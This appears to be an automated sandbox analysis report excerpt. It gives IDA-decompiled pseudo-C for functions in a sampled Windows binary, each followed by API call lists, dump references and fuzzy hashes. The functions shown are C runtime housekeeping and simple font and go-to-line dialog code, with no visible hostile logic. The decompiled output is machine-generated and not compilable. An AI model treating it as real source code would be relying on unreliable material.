                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: _free$Pointer$DecodeDecrementEncodeErrorFreeHeapInterlockedLast
                                                  • String ID:
                                                  • API String ID: 4264854383-0
                                                  • Opcode ID: 3f59c820730e33b1437fc1078dd92d109ec86f0f677a9cd5f6c42cd606024b40
                                                  • Instruction ID: 49cb8943cc238bacaf1c82f7eb73b6b2babcfc6f048d7d3298659976d4d44964
                                                  • Opcode Fuzzy Hash: 3f59c820730e33b1437fc1078dd92d109ec86f0f677a9cd5f6c42cd606024b40
                                                  • Instruction Fuzzy Hash: 88210879801212DFE7386FECF9544463FA4FB55722398816AEAC4E7559CF7E48828F40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 86%
                                                  			E010A7366(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                  				signed int* _t81;
                                                  				void* _t86;
                                                  				long _t90;
                                                  				intOrPtr _t94;
                                                  				signed int _t98;
                                                  				signed int _t99;
                                                  				signed char _t103;
                                                  				intOrPtr* _t105;
                                                  				intOrPtr _t106;
                                                  				intOrPtr* _t109;
                                                  				signed char _t111;
                                                  				long _t119;
                                                  				signed int _t130;
                                                  				signed int* _t134;
                                                  				intOrPtr _t135;
                                                  				signed int* _t138;
                                                  				void** _t139;
                                                  				intOrPtr _t141;
                                                  				void* _t142;
                                                  				signed int _t143;
                                                  				void** _t147;
                                                  				signed int _t149;
                                                  				void* _t150;
                                                  				void** _t154;
                                                  				void* _t155;
                                                  
                                                  				_push(0x64);
                                                  				_push(0x10bf168);
                                                  				E010A61F0(__ebx, __edi, __esi);
                                                  				E010A8834(0xb);
                                                  				_t130 = 0;
                                                  				 *(_t155 - 4) = 0;
                                                  				if( *0x10c2de0 == 0) {
                                                  					_push(0x40);
                                                  					_t141 = 0x20;
                                                  					_push(_t141);
                                                  					_t81 = E010A8C83();
                                                  					_t134 = _t81;
                                                  					 *(_t155 - 0x24) = _t134;
                                                  					if(_t134 != 0) {
                                                  						 *0x10c2de0 = _t81;
                                                  						 *0x10c2dc0 = _t141;
                                                  						while(_t134 <  &(_t81[0x200])) {
                                                  							_t134[1] = 0xa00;
                                                  							 *_t134 =  *_t134 | 0xffffffff;
                                                  							_t134[2] = _t130;
                                                  							_t134[9] = _t134[9] & 0x00000080;
                                                  							_t134[9] = _t134[9] & 0x0000007f;
                                                  							_t134[9] = 0xa0a;
                                                  							_t134[0xe] = _t130;
                                                  							_t134[0xd] = _t130;
                                                  							_t134 =  &(_t134[0x10]);
                                                  							 *(_t155 - 0x24) = _t134;
                                                  							_t81 =  *0x10c2de0;
                                                  						}
                                                  						GetStartupInfoW(_t155 - 0x74);
                                                  						if( *((short*)(_t155 - 0x42)) == 0) {
                                                  							while(1) {
                                                  								L31:
                                                  								 *(_t155 - 0x2c) = _t130;
                                                  								if(_t130 >= 3) {
                                                  									break;
                                                  								}
                                                  								_t147 =  *0x10c2de0 + (_t130 << 6);
                                                  								 *(_t155 - 0x24) = _t147;
                                                  								if( *_t147 == 0xffffffff ||  *_t147 == 0xfffffffe) {
                                                  									_t147[1] = 0x81;
                                                  									if(_t130 != 0) {
                                                  										_t66 = _t130 - 1; // -1
                                                  										asm("sbb eax, eax");
                                                  										_t90 =  ~_t66 + 0xfffffff5;
                                                  									} else {
                                                  										_t90 = 0xfffffff6;
                                                  									}
                                                  									_t142 = GetStdHandle(_t90);
                                                  									if(_t142 == 0xffffffff || _t142 == 0) {
                                                  										L47:
                                                  										_t147[1] = _t147[1] | 0x00000040;
                                                  										 *_t147 = 0xfffffffe;
                                                  										_t94 =  *0x10c2ee4;
                                                  										if(_t94 != 0) {
                                                  											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
                                                  										}
                                                  										goto L49;
                                                  									} else {
                                                  										_t98 = GetFileType(_t142);
                                                  										if(_t98 == 0) {
                                                  											goto L47;
                                                  										}
                                                  										 *_t147 = _t142;
                                                  										_t99 = _t98 & 0x000000ff;
                                                  										if(_t99 != 2) {
                                                  											if(_t99 != 3) {
                                                  												L46:
                                                  												_t70 =  &(_t147[3]); // -17575380
                                                  												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
                                                  												_t147[2] = _t147[2] + 1;
                                                  												goto L49;
                                                  											}
                                                  											_t103 = _t147[1] | 0x00000008;
                                                  											L45:
                                                  											_t147[1] = _t103;
                                                  											goto L46;
                                                  										}
                                                  										_t103 = _t147[1] | 0x00000040;
                                                  										goto L45;
                                                  									}
                                                  								} else {
                                                  									_t147[1] = _t147[1] | 0x00000080;
                                                  									L49:
                                                  									_t130 = _t130 + 1;
                                                  									continue;
                                                  								}
                                                  							}
                                                  							 *(_t155 - 4) = 0xfffffffe;
                                                  							E010A762A();
                                                  							L2:
                                                  							_t86 = 1;
                                                  							L3:
                                                  							return E010A6235(_t86);
                                                  						}
                                                  						_t105 =  *((intOrPtr*)(_t155 - 0x40));
                                                  						if(_t105 == 0) {
                                                  							goto L31;
                                                  						}
                                                  						_t135 =  *_t105;
                                                  						 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
                                                  						_t106 = _t105 + 4;
                                                  						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
                                                  						 *(_t155 - 0x20) = _t106 + _t135;
                                                  						if(_t135 >= 0x800) {
                                                  							_t135 = 0x800;
                                                  							 *((intOrPtr*)(_t155 - 0x1c)) = 0x800;
                                                  						}
                                                  						_t149 = 1;
                                                  						 *(_t155 - 0x30) = 1;
                                                  						while( *0x10c2dc0 < _t135) {
                                                  							_t138 = E010A8C83(_t141, 0x40);
                                                  							 *(_t155 - 0x24) = _t138;
                                                  							if(_t138 != 0) {
                                                  								0x10c2de0[_t149] = _t138;
                                                  								 *0x10c2dc0 =  *0x10c2dc0 + _t141;
                                                  								while(_t138 <  &(0x10c2de0[_t149][0x200])) {
                                                  									_t138[1] = 0xa00;
                                                  									 *_t138 =  *_t138 | 0xffffffff;
                                                  									_t138[2] = _t130;
                                                  									_t138[9] = _t138[9] & 0x00000080;
                                                  									_t138[9] = 0xa0a;
                                                  									_t138[0xe] = _t130;
                                                  									_t138[0xd] = _t130;
                                                  									_t138 =  &(_t138[0x10]);
                                                  									 *(_t155 - 0x24) = _t138;
                                                  								}
                                                  								_t149 = _t149 + 1;
                                                  								 *(_t155 - 0x30) = _t149;
                                                  								_t135 =  *((intOrPtr*)(_t155 - 0x1c));
                                                  								continue;
                                                  							}
                                                  							_t135 =  *0x10c2dc0;
                                                  							 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
                                                  							break;
                                                  						}
                                                  						_t143 = _t130;
                                                  						 *(_t155 - 0x2c) = _t143;
                                                  						_t109 =  *((intOrPtr*)(_t155 - 0x28));
                                                  						_t139 =  *(_t155 - 0x20);
                                                  						while(_t143 < _t135) {
                                                  							_t150 =  *_t139;
                                                  							if(_t150 == 0xffffffff || _t150 == 0xfffffffe) {
                                                  								L26:
                                                  								_t143 = _t143 + 1;
                                                  								 *(_t155 - 0x2c) = _t143;
                                                  								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
                                                  								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
                                                  								_t139 =  &(_t139[1]);
                                                  								 *(_t155 - 0x20) = _t139;
                                                  								continue;
                                                  							} else {
                                                  								_t111 =  *_t109;
                                                  								if((_t111 & 0x00000001) == 0) {
                                                  									goto L26;
                                                  								}
                                                  								if((_t111 & 0x00000008) != 0) {
                                                  									L24:
                                                  									_t154 = 0x10c2de0[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
                                                  									 *(_t155 - 0x24) = _t154;
                                                  									 *_t154 =  *_t139;
                                                  									_t154[1] =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
                                                  									_t38 =  &(_t154[3]); // 0xd
                                                  									InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
                                                  									_t154[2] = _t154[2] + 1;
                                                  									_t139 =  *(_t155 - 0x20);
                                                  									L25:
                                                  									_t135 =  *((intOrPtr*)(_t155 - 0x1c));
                                                  									goto L26;
                                                  								}
                                                  								_t119 = GetFileType(_t150);
                                                  								_t139 =  *(_t155 - 0x20);
                                                  								if(_t119 == 0) {
                                                  									goto L25;
                                                  								}
                                                  								goto L24;
                                                  							}
                                                  						}
                                                  						goto L31;
                                                  					}
                                                  					E010A6430(_t155, 0x10c12e0, _t155 - 0x10, 0xfffffffe);
                                                  					_t86 = 0;
                                                  					goto L3;
                                                  				}
                                                  				E010A6430(_t155, 0x10c12e0, _t155 - 0x10, 0xfffffffe);
                                                  				goto L2;
                                                  			}

                                                  APIs
                                                  • __lock.LIBCMT ref: 010A7374
                                                    • Part of subcall function 010A8834: __mtinitlocknum.LIBCMT ref: 010A8846
                                                    • Part of subcall function 010A8834: __amsg_exit.LIBCMT ref: 010A8852
                                                    • Part of subcall function 010A8834: EnterCriticalSection.KERNEL32(00000000,?,010A7AC9,0000000D), ref: 010A885F
                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 010A7392
                                                  • __calloc_crt.LIBCMT ref: 010A73AB
                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 010A73C6
                                                  • GetStartupInfoW.KERNEL32(?,010BF168,00000064), ref: 010A741B
                                                  • __calloc_crt.LIBCMT ref: 010A7466
                                                  • GetFileType.KERNEL32(00000001), ref: 010A74AD
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 010A74E6
                                                  • GetStdHandle.KERNEL32(-000000F6), ref: 010A759F
                                                  • GetFileType.KERNEL32(00000000), ref: 010A75B1
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(-010C2DD4,00000FA0), ref: 010A75E6
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__amsg_exit__lock__mtinitlocknum
                                                  • String ID:
                                                  • API String ID: 301580142-0
                                                  • Opcode ID: 45094ab88985f9fa112cef7e77d96cca6fb8f266cc24d37cd8c97db0fd12efa3
                                                  • Instruction ID: d1f24fc3699efed2d4afe8025cc911d00276a7615ee5998c638286cda392c291
                                                  • Opcode Fuzzy Hash: 45094ab88985f9fa112cef7e77d96cca6fb8f266cc24d37cd8c97db0fd12efa3
                                                  • Instruction Fuzzy Hash: B691B3719043468FDB24CFB8C8805ADBFF4AF09325B54866ED4E6AB3C1DB769802CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 84%
                                                  			E010B6818(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
                                                  				signed int _v8;
                                                  				signed int _v32;
                                                  				intOrPtr _v36;
                                                  				signed int _v40;
                                                  				void* _t38;
                                                  				signed int _t45;
                                                  				signed int _t60;
                                                  				intOrPtr _t77;
                                                  				void* _t80;
                                                  				intOrPtr* _t82;
                                                  				signed int _t83;
                                                  				signed int _t86;
                                                  				intOrPtr _t88;
                                                  				void* _t92;
                                                  
                                                  				_t80 = __edx;
                                                  				_push(__ebx);
                                                  				_push(__esi);
                                                  				_t86 = 0;
                                                  				if(_a12 <= 0) {
                                                  					L5:
                                                  					return _t38;
                                                  				} else {
                                                  					_push(__edi);
                                                  					_t82 =  &_a12;
                                                  					while(1) {
                                                  						_t82 = _t82 + 4;
                                                  						_t38 = E010A412F(_a4, _a8,  *_t82);
                                                  						_t92 = _t92 + 0xc;
                                                  						if(_t38 != 0) {
                                                  							break;
                                                  						}
                                                  						_t86 = _t86 + 1;
                                                  						if(_t86 < _a12) {
                                                  							continue;
                                                  						} else {
                                                  							goto L5;
                                                  						}
                                                  						goto L20;
                                                  					}
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					E010A4060(0, _t80);
                                                  					asm("int3");
                                                  					_push(0x14);
                                                  					_push(0x10bf590);
                                                  					E010A61F0(0, _t82, _t86);
                                                  					_t66 = 0;
                                                  					_v32 = 0;
                                                  					__eflags = _a4 - 5;
                                                  					if(_a4 <= 5) {
                                                  						_t88 = E010A7A00();
                                                  						_v36 = _t88;
                                                  						E010AEBF8(0, _t80, _t82, _t88, __eflags);
                                                  						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
                                                  						_v8 = _v8 & 0;
                                                  						_t83 = E010A8C83(0xb8, 1);
                                                  						_v40 = _t83;
                                                  						__eflags = _t83;
                                                  						if(_t83 != 0) {
                                                  							E010A8834(0xc);
                                                  							_v8 = 1;
                                                  							E010B6250(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
                                                  							_v8 = _v8 & 0x00000000;
                                                  							E010B698D();
                                                  							_t66 = E010B6B48(0, _t80, _t83, _t88, _t83, _a4, _a8);
                                                  							_v32 = _t66;
                                                  							__eflags = _t66;
                                                  							if(_t66 == 0) {
                                                  								E010AEB5D(_t83);
                                                  								_t43 = E010AEA03(_t83);
                                                  							} else {
                                                  								__eflags = _a8;
                                                  								if(_a8 != 0) {
                                                  									_t60 = E010BA6E7(_a8, 0x10c1c34);
                                                  									__eflags = _t60;
                                                  									if(_t60 != 0) {
                                                  										 *0x10c2d94 = 1;
                                                  									}
                                                  								}
                                                  								E010A8834(0xc);
                                                  								_v8 = 2;
                                                  								_t25 = _t88 + 0x6c; // 0x6c
                                                  								E010AEC74(_t25, _t83);
                                                  								E010AEB5D(_t83);
                                                  								__eflags =  *(_t88 + 0x70) & 0x00000002;
                                                  								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
                                                  									__eflags =  *0x10c1e64 & 0x00000001;
                                                  									if(( *0x10c1e64 & 0x00000001) == 0) {
                                                  										E010AEC74(0x10c1d9c,  *((intOrPtr*)(_t88 + 0x6c)));
                                                  										_t77 =  *0x10c1d9c; // 0x10c1da0
                                                  										_t32 = _t77 + 0x84; // 0x10c1e78
                                                  										 *0x10c1e70 =  *_t32;
                                                  										_t33 = _t77 + 0x90; // 0x10bd700
                                                  										 *0x10c1ecc =  *_t33;
                                                  										_t34 = _t77 + 0x74; // 0x1
                                                  										 *0x10c1e60 =  *_t34;
                                                  									}
                                                  								}
                                                  								_v8 = _v8 & 0x00000000;
                                                  								_t43 = E010B699C();
                                                  							}
                                                  						}
                                                  						_v8 = 0xfffffffe;
                                                  						E010B69CF(_t43, _t88);
                                                  						_t45 = _t66;
                                                  					} else {
                                                  						 *((intOrPtr*)(E010A6117())) = 0x16;
                                                  						E010A4035();
                                                  						_t45 = 0;
                                                  					}
                                                  					return E010A6235(_t45);
                                                  				}
                                                  				L20:
                                                  			}


















                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                                                  • String ID:
                                                  • API String ID: 790675137-0
                                                  • Opcode ID: fee3a7946a8ac0add862ecac9c5c939c24ccd49d8376d158de31346c2cfb0658
                                                  • Instruction ID: efe6c5876d71e908daa36a8e4fc6b21211ce6033b50e6187086db5f758fb727b
                                                  • Opcode Fuzzy Hash: fee3a7946a8ac0add862ecac9c5c939c24ccd49d8376d158de31346c2cfb0658
                                                  • Instruction Fuzzy Hash: F941027240030AEFDB10AFE8E884BDD7BF4AF24314F10416DE9999A281DBB79601CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E010B4EB3(void* __eflags, signed int _a4) {
                                                  				void* _t12;
                                                  				signed int _t13;
                                                  				signed int _t16;
                                                  				intOrPtr _t18;
                                                  				void* _t22;
                                                  				signed int _t35;
                                                  				long _t40;
                                                  
                                                  				_t13 = E010A732B(_t12);
                                                  				if(_t13 >= 0) {
                                                  					_t35 = _a4;
                                                  					if(E010AE743(_t35) == 0xffffffff) {
                                                  						L10:
                                                  						_t40 = 0;
                                                  					} else {
                                                  						_t18 =  *0x10c2de0;
                                                  						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
                                                  							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
                                                  								goto L8;
                                                  							} else {
                                                  								goto L7;
                                                  							}
                                                  						} else {
                                                  							L7:
                                                  							_t22 = E010AE743(2);
                                                  							if(E010AE743(1) == _t22) {
                                                  								goto L10;
                                                  							} else {
                                                  								L8:
                                                  								if(CloseHandle(E010AE743(_t35)) != 0) {
                                                  									goto L10;
                                                  								} else {
                                                  									_t40 = GetLastError();
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  					E010AE6BD(_t35);
                                                  					 *((char*)( *((intOrPtr*)(0x10c2de0 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
                                                  					if(_t40 == 0) {
                                                  						_t16 = 0;
                                                  					} else {
                                                  						_t16 = E010A60F6(_t40) | 0xffffffff;
                                                  					}
                                                  					return _t16;
                                                  				} else {
                                                  					return _t13 | 0xffffffff;
                                                  				}
                                                  			}











                                                  APIs
                                                  • __ioinit.LIBCMT ref: 010B4EB6
                                                    • Part of subcall function 010A732B: InitOnceExecuteOnce.KERNEL32(010C27C0,010A7366,00000000,00000000,010B310F,00000109), ref: 010A7339
                                                  • __get_osfhandle.LIBCMT ref: 010B4ECA
                                                  • __get_osfhandle.LIBCMT ref: 010B4EF5
                                                  • __get_osfhandle.LIBCMT ref: 010B4EFE
                                                  • __get_osfhandle.LIBCMT ref: 010B4F0A
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,010B34E2,?,?,?,?,?,?,?,?,010A28B9,?,00000109), ref: 010B4F11
                                                  • GetLastError.KERNEL32(?,010B34E2,?,?,?,?,?,?,?,?,010A28B9,?,00000109), ref: 010B4F1B
                                                  • __free_osfhnd.LIBCMT ref: 010B4F28
                                                  • __dosmaperr.LIBCMT ref: 010B4F4A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
                                                  • String ID:
                                                  • API String ID: 974577687-0
                                                  • Opcode ID: 5a509d894aa871d30884bdfd4e17dfc0b918dd6ca09539b7a98c6d676df5daeb
                                                  • Instruction ID: f86e46c417653817b8e0905dd52ce2df119757fb38dfdc4208d81a367b7fdf73
                                                  • Opcode Fuzzy Hash: 5a509d894aa871d30884bdfd4e17dfc0b918dd6ca09539b7a98c6d676df5daeb
                                                  • Instruction Fuzzy Hash: 1E118C3260511215E671227CA8CC7FE3BD85B92730F590388F9EECB1C3FE65C2418280
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E010A2340() {
                                                  				struct %anon40 _v64;
                                                  				void _v156;
                                                  				int _t19;
                                                  				int _t23;
                                                  				void* _t25;
                                                  
                                                  				memcpy( &_v156, 0x10c3f40, 0x17 << 2);
                                                  				E010A66E0( &_v64, 0, 0x3c);
                                                  				_v64.hwndOwner =  *0x10c3f24;
                                                  				_v64.lpLogFont =  &_v156;
                                                  				_v64.lStructSize = 0x3c;
                                                  				_v64.Flags = 0x1000041;
                                                  				_t19 = ChooseFontW( &_v64);
                                                  				if(_t19 != 0) {
                                                  					_t25 =  *0x10c3f30;
                                                  					 *0x10c3f30 = CreateFontIndirectW( &_v156);
                                                  					memcpy(0x10c3f40,  &_v156, 0x17 << 2);
                                                  					_t23 = SendMessageW( *0x10c3f2c, 0x30,  *0x10c3f30, 1);
                                                  					if(_t25 != 0) {
                                                  						_t23 = DeleteObject(_t25);
                                                  					}
                                                  					return _t23;
                                                  				}
                                                  				return _t19;
                                                  			}









                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Font$ChooseCreateDeleteIndirectMessageObjectSend_memset
                                                  • String ID: <$A
                                                  • API String ID: 3794199884-570643782
                                                  • Opcode ID: 0f4cab98a615f8ffe87abf63c39f860482ae95880a463a2024feb54f57c1e1ef
                                                  • Instruction ID: 7a29cddd51ea12a122c8cdcb81fdf194d50a3233dbb07d826403b7cab9581bec
                                                  • Opcode Fuzzy Hash: 0f4cab98a615f8ffe87abf63c39f860482ae95880a463a2024feb54f57c1e1ef
                                                  • Instruction Fuzzy Hash: F71173729202099BEB609FA4ECC4BCE77B8F709704F004065F68DAB245DB765549CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E010A27B0(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                  				void* _t8;
                                                  				void* _t15;
                                                  
                                                  				_t8 = _a8 - 0x110;
                                                  				if(_t8 == 0) {
                                                  					SetDlgItemInt(_a4, 0x194, SendMessageW( *0x10c3f2c, 0xc9, 0xffffffff, 0) + 1, 0);
                                                  					goto L7;
                                                  				} else {
                                                  					if(_t8 != 1) {
                                                  						L7:
                                                  						return 0;
                                                  					} else {
                                                  						_t15 = _a12 - 1;
                                                  						if(_t15 == 0) {
                                                  							SendMessageW( *0x10c3f2c, 0xb1, SendMessageW( *0x10c3f2c, 0xbb, GetDlgItemInt(_a4, 0x194, 0, 0) - 1, 0), _t18);
                                                  							EndDialog(_a4, 1);
                                                  							return 1;
                                                  						} else {
                                                  							if(_t15 != 1) {
                                                  								goto L7;
                                                  							} else {
                                                  								EndDialog(_a4, 2);
                                                  								return 1;
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  			}






                                                  APIs
                                                  • EndDialog.USER32(?,00000002), ref: 010A27D6
                                                  • GetDlgItemInt.USER32(?,00000194,00000000,00000000), ref: 010A27F1
                                                  • SendMessageW.USER32(000000BB,-00000001,00000000), ref: 010A2806
                                                  • SendMessageW.USER32(000000B1,00000000,00000000), ref: 010A2819
                                                  • EndDialog.USER32(?,00000001), ref: 010A2824
                                                  • SendMessageW.USER32(000000C9,000000FF,00000000), ref: 010A2842
                                                  • SetDlgItemInt.USER32(?,00000194,00000001,00000000), ref: 010A2854
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$DialogItem
                                                  • String ID:
                                                  • API String ID: 3626491743-0
                                                  • Opcode ID: 192abd57bf00c6b233b02b5073f0d2b5b0900823f5a0bbaa51812e98e0b5d146
                                                  • Instruction ID: e6c11a7046e927d2f13821a542ba69f3963b244d109982ba229e30fd1d703c91
                                                  • Opcode Fuzzy Hash: 192abd57bf00c6b233b02b5073f0d2b5b0900823f5a0bbaa51812e98e0b5d146
                                                  • Instruction Fuzzy Hash: AE014C31290209BFFB315BA4ED99FA63B64F708700F508421FAD9D81E4C7BB98619B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 88%
                                                  			E010B6054(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                  				void* _t11;
                                                  				intOrPtr* _t17;
                                                  				intOrPtr* _t31;
                                                  				void* _t32;
                                                  
                                                  				_push(8);
                                                  				_push(0x10bf568);
                                                  				_t11 = E010A61F0(__ebx, __edi, __esi);
                                                  				_t31 =  *((intOrPtr*)(_t32 + 8));
                                                  				if(_t31 != 0) {
                                                  					E010A8834(0xd);
                                                  					 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
                                                  					if( *(_t31 + 4) != 0 && InterlockedDecrement( *(_t31 + 4)) == 0 &&  *(_t31 + 4) != 0x10c19f8) {
                                                  						E010A8C4B( *(_t31 + 4));
                                                  					}
                                                  					 *(_t32 - 4) = 0xfffffffe;
                                                  					E010B6664();
                                                  					if( *_t31 != 0) {
                                                  						E010A8834(0xc);
                                                  						 *(_t32 - 4) = 1;
                                                  						E010AEB5D( *_t31);
                                                  						_t17 =  *_t31;
                                                  						if(_t17 != 0 &&  *_t17 == 0 && _t17 != 0x10c1da0) {
                                                  							E010AEA03(_t17);
                                                  						}
                                                  						 *(_t32 - 4) = 0xfffffffe;
                                                  						E010B6670();
                                                  					}
                                                  					_t11 = E010A8C4B(_t31);
                                                  				}
                                                  				return E010A6235(_t11);
                                                  			}








                                                  APIs
                                                  • __lock.LIBCMT ref: 010B65D8
                                                    • Part of subcall function 010A8834: __mtinitlocknum.LIBCMT ref: 010A8846
                                                    • Part of subcall function 010A8834: __amsg_exit.LIBCMT ref: 010A8852
                                                    • Part of subcall function 010A8834: EnterCriticalSection.KERNEL32(00000000,?,010A7AC9,0000000D), ref: 010A885F
                                                  • InterlockedDecrement.KERNEL32(00000000), ref: 010B65EB
                                                  • _free.LIBCMT ref: 010B6601
                                                    • Part of subcall function 010A8C4B: HeapFree.KERNEL32(00000000,00000000,?,010A88AB,00000000,?,?,010A7B46,010A3D79,010BEFC0,00000014), ref: 010A8C5F
                                                    • Part of subcall function 010A8C4B: GetLastError.KERNEL32(010C15B0,?,010A88AB,00000000,?,?,010A7B46,010A3D79,010BEFC0,00000014), ref: 010A8C71
                                                  • __lock.LIBCMT ref: 010B661A
                                                  • ___removelocaleref.LIBCMT ref: 010B6629
                                                  • ___freetlocinfo.LIBCMT ref: 010B6642
                                                  • _free.LIBCMT ref: 010B6655
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: __lock_free$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                  • String ID:
                                                  • API String ID: 556454624-0
                                                  • Opcode ID: e43e9eec09588cccf3cd69ce1f076d0fee24672c862f952b1346ed72aa618dc0
